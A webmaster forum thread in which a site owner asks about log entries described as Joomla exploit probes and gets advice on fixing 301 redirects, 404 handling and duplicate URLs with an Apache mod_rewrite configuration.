That's someone looking for some sort of exploit in Joomla.

Your server redirected the request to a different URL.

Whether the user followed that redirect or not is unknown, and if they did neither is the result.

Oh, thank you, I don't use Joomla so this kind of attack wouldn't work on my site?

Sorry I'm dumb lol

you need top make those same requests and check the response and see if you are exposing any vulnerabilities with that response.
since it is a 301 redirect, you need to see what location the redirect is suggesting.

The first one redirects to my 404 html page.

and the second one redirects to a page that I actually have "tom.shtml" but it keeps everything after the ? on the end of my url...

What should I do?

Well, it is your site that issues the redirect when that request is received. Why does it do that? What is the purpose of the redirect?


I hope there is no "redirect to the 404 page". That would be SEO suicide.

there is almost no case for a redirect to a "404 html page" ever being the correct response.
the correct response is typically to return a 404 Not Found status code.
then configure the server to provide the "404 html page" content as a custom error page for 404 status code responses.

regarding the query string in the redirected url, it depends on your server of course, but assuming apache and mod-rewrite...
http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewriterule [httpd.apache.org]:

Note:Query String
When you want to erase an existing query string, end the substitution string with just a question mark.

Okay, I have some problems and I don't know how to fix them.

First, a bunch of urls were indexed with a double slash, with an extra trailing slash, and with the wrong subdirectory but they would all go to the same page.

Like this, different urls all going to the same page:

example.com/page.html
example.com//page.html
example.com//page.html/
example.com/something/page.html

So I now have redirects that are supposed to make each extra url go to one page, but I am having some unwanted results.

For example if a page doesn't exist but the url has a double slash then a 301 is returned instead of a 404, and the 301 is to my custom 404 page.

I tried just removing the redirect code but the duplicate urls immediately came back, it's a mess.

The first things I guess to do is to try and find out where the urls are coming from in the first place? Then what do I do?

Thanks so much you guys!

I shouldn't have tried this without knowing what I'm doing.

Options +FollowSymLinks
RewriteEngine on
# Remove multiple slashes anywhere in URL
RewriteCond %{REQUEST_URI} ^(.*)//(.*)$
RewriteRule . http://www.example.com%1/%2 [R=301,L]
#
# Remove trailing slash if filetype present in URL
RewriteRule ^(.+\.[^/]+)/$ http://www.example.com/$1 [R=301,L]

# Remove extra URL-path info if filetype present in URL
RewriteRule ^([^.]+\.[^/]+)/ http://www.example.com/$1 [R=301,L]

RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /([^/]+/)*index\.shtml\ HTTP/
RewriteRule ^(([^/]+/)*)index\.shtml$ http://www.example.com/$1 [R=301,L]

RewriteCond %{REQUEST_URI} !^/404\.html$
RewriteCond %{HTTP_HOST} ^example\.com [OR]
RewriteCond %{HTTP_HOST} ^www\.example\.com\. [OR]
RewriteCond %{HTTP_HOST} ^www\.example\.com\:[0-9]+
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]

#